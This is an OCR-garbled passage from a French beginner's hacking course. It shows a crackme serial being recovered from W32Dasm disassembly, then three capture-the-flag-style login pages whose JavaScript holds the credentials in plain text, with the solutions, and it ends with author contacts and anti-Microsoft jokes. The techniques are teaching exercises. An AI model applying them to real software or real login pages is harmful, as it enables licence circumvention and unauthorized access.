sauts conditionnels. 



: 0040150C 


E833030000 


Call 00401 


844 




: 00401511 


8B07 


mov eax, dword 


ptr [edi] 




: 00401513 


803836 


cmp byte ptr 


[eax] , 36 




: 00401516 


751E 


jne 00401536 






: 00401518 


80780132 


cmp byte ptr 


[eax+01] , 


32 


: 0040151C 


7518 


jne 00401536 






: 0040151E 


80780238 


cmp byte ptr 


[eax+02] , 


38 


: 00401522 


7512 


jne 00401536 






: 00401524 


80780337 


cmp byte ptr 


[eax+03] , 


37 


: 00401528 


750C 


jne 00401536 






: 0040152A 


8078042D 


cmp byte ptr 


[eax+04] , 


2D 


: 0040152E 


7506 


jne 00401536 






: 00401530 


80780541 


cmp byte ptr 


[eax+05] , 


41 


: 00401534 


7417 


je 0040154D 







Puis nous voyons que nous arrivons au message d'erreur a partir de plusieurs 
references (dont les adresses sont celles des sauts conditionnels). 
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* Referenced by a (U) nconditional or (C ) onditional Jump at 
Addresses : 

| : 004014E4 (C) , : 004014F3 (C) , : 00401516 (C) , 
: 0040151C (C) , : 00401522 (C) 
I : 00401528 (C) , : 0040152E (C) 



La, pas de doute, nous sommes arrives au moment ou le programme va comparer le 
numero de serie fournit par l'utilisateur et le comparer au bon numero de serie. 

Arrive a ce stade, nous avons 2 choix : soit nous prenons un debogueur et nous 
explorons le registre eax (car d'apres le desassembleur le programme enregistre le 
numero de serie dans ce registre), soit nous continuons avec W32Dasm et nous 
voyons avec quoi le programme compare le numero de serie fournit avec l'utilisateur 
(avec de la chance il le compare avec chaque octet du bon numero de serie). 

Pour ne pas se surcharger de logiciels, continuons avec W32Dasm. 

Les octets que Ton va analyser sont : 32, 36, 38, 37, 2D, 41. Comme les 
desassembleurs traitent les informations en hexadecimal, nous allons convertir chacun 
de ces octets. Ce qui nous donne : 6287-A. 

Dans le reste du code, je n'ai rien trouve d'interessant au sujet du nom qu'il fallait 
fournir, j'ai done decider d'en fournir un au hasard, et j'ai ete surpris quand j'ai vu 
que ce crackme acceptait n'importe quel nom. 

Nous venons de decouvrir le nom et le numero de serie d'une application, voici ce 
que cette derniere nous dit quand on entre ces nouvelles donnees. 



Iyou did it 




Well done,KHAALEL 




1 « il 





Ce tutorial sur le cracking avait pour but de vous montrer comment il etait possible de 
patcher un programme. Bien sur, e'est un challenge simple a reussir mais qui est 
interessant pour une initiation. 
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Tests de cracking de mots de passe Web 



Cette annexe vient completer le chapitre sur le piratage du web. Elle est totalement 
orientee pratique car nous allons faire des challenge de cracking. Ces challenges vont 
consister a retrouver des mots de passe pour reussir a passer des systemes 
d ' authentific ation. 



1 protection javascript 

Voici le challenge : 



Identification 






Login: 


1 1 




Password: 




1 






Login | 


Retablir | 



Lorsque Ton est en face de protection par mot de passe utilisant le javascript, il faut, 
en premier, aller voir le code source de la page (grace a Affichage/Source) et 
1' analyser car la plupart du temps le developpeur y a insere les informations de 
connexion (dans le code en javascript, pour plus de precision). 

Voici le code source de la page: 

<html> 
<head> 

<title>Authentif ication</title> 
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<meta name="generator" content="Namo WebEditor v5.0"> 
</head> 

<body bgcolor="white" text="black" link="blue" vlink="purple" 
alink="red"> 

</td> 

<td width="10" rowspan="2"> </td> 

<td width="600" rowspan="2" valign="top" bgcolor="#99CCFF"Xcenter> 

<p>  </p> 
</center><br> 

<DIV><script language=" j avascript"> 
<!— // 

function chekunr ( f orm) { 

if (form. id. value=="admin" ) { 

if (form. pass . value=="khaalel" ) { 

lo cat ion="admini strati on . html" 

} else { 

alert ( "Erreur de mot de passe") 
} 

} else { alert ( "Erreur de login") 

} 

} 

II— > 

</ script> 

<center> 

<table bgcolor="white" cellpadding=" 12 " border="l"> 
<tr><td 

colspan="2"><centerxhlxi><b>Identif ication</bx/i></hlx/center>< 
/tdx/tr> 

<trxtdxhlxixb>Login: </b></ ix/hlx/tdxtdxf orm 
name=" login" x input 
name="id" type="text"> 

</ f orm> 

</tdx/tr> 

<trxtd><hlxixb>Pas sword: </bx/ix/hlx/tdxtdxinput name="pass" 
type="pas sword" ></tdx/tr> 

<tr><td><centerXinput type="button" value="Login" 

onClick="chekunr (this . form) "x/centerx/tdxtdxcenterxbrxinput 
type="Reset"x/centerx/formx/tdx/trx/table></center> 

<p>  </p> 
</DIV> 
</body> 

</html> 



Pouvez-vous trouver le login et le mot de passe ? Aller, cherchez un peu. 



Solution : 

le login est admin 
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le mot de passe est khaalel 



2 eme protection javascript 

Voici le challenge : 

Login :f 



Mot de passe: I Qn y va 



Voici le code source : 

<html> 
<head> 

<title>Authentif ication</title> 

<meta name="generator" content="Namo WebEditor v5.0"> 
</head> 

<body bgcolor="white" text="black" link="blue" vlink="purple" 
alink="red"> 
<f orm> 
<p>Login : 

<input type="text" name="login"> 

</p> 

<p>Mot de passe: 

<input type="password" name="pass"> 

<input type="button" value="On y va" name="Submit" 

onclick=j a va script : validate (login . value, "admin" , pass . value , "khaalel 
") > 

</p> 
</ f orm> 

<script language = " javascript"> 
function chekunr (tO , tl , t2 , t3 ) 
{ 

if (tO==tl && t2==t3) 

load ( ' administration . html ' ) ; 

else 

{ 

load ( ' 40 4 .html ' ) ; 

} 
} 

function load(url) 
{ 
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location. href =url ; 
} 

</ script> 
</body> 

</html> 

Avez-vous trouve la solution? 



Solution : 

le login (tO) doit avoir la meme valeur que tl (soit admin). 
idem pour le mot de passe et khaalel. 



3 eme protection javascript 

Voici la protection : 



[invite utilisateur de Internet Explorer 


r 


Invite de script : 

Entrer votre mot de passe 


OK 
Annuler 









Voici le code source : 



<SCRIPT> 




function chekunr ( ) { 




var test = 1; 




var pass = prompt (' Entrer votre mot de passe',' 


' ) ; 


while (test < 3) { 




if ( ! pass ) 




history . go ( -1 ) ; 




if (pass . toLowerCase ( ) == "khaalel") { 




window .open ( ' administration . html ' ) ; 




break; 




} 

test+=l; 




var pass = 




prompt (' Erreur de mot de passe', 'Password') ; 
} 




if (pass . toLowerCase ( ) ! ="password" & test ==3) 




history . go ( -1 ) ; 




return " " ; 
} 
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</SCRIPT> 



Avez-vous trouve la solution? 



Solution : 

Le mot de passe est khaalel 
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Bon, on se quitte ici, dommage, vous me manquerez (lol). 

J'espere que je vous ai bien aide. Au revoir et surement a bientot. 

Venez consulter mes sites : http://www.cksecurity.fr.fm et 
http://cksecurity.free.fr vous y trouverez surement des articles interressants et 
d'autres cours. 

Pour ceux qui veulent des informations en tout genre, voici mon adresse : 
spike23@netcourrier.com. Pour toute critique ou compliment (je dis pas non), 
vous pouvez aussi m'ecrire. 




Pour finir en beaute ce cours, voici des images humoristiques (pour moi en tout cas). 
Certaines seront un peu critiques a l'egard de Bill Gates, mais ce n'est que de 
1' humour, faut se detendre... 



GNURF 



copyright 1995-1997 Paul Sodorholm 
••mail: gnurtftsiirfnet.fi 



PANS WINDOWS.. 



ENHN ONE PONNE NOWEllE FQNCTlON 
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Microsoft 
CaveOffice 



'Me discover fire, 
invent wheel , 
build server" 



Microsoft 

Copyright © 1985-1996 
Microsoft Corporation 




Version: 4.0 
NT: Neanderthal Technology 



This product is protected by US and international copyright laws as described in the About Box. 



Un petite priere 

Notre Gates, qui est a Seattle, 

Que ton Windows soit debogue. 

Que ton monopole s'impose, 

Que tes commandes soient executees, 

Sur le web comme sur le disque dur. 

Donnes nous aujourd'hui 

Nos mises a jour quotidiennes 

Et pardonne-nous nos utilisations de Linux, 

Comme nous pardonnons aussi 

A ceux qui ont utilise des Mac. 

Et ne nous soumets pas au Dr Watson, 

Mais delivre nous du plantage 

Car c'est a toi qu'appartiennent, 

Le Copyright, les megahertz et les capitaux 

Au moins jusqu'a Can 2000 



Amen (..ne les 
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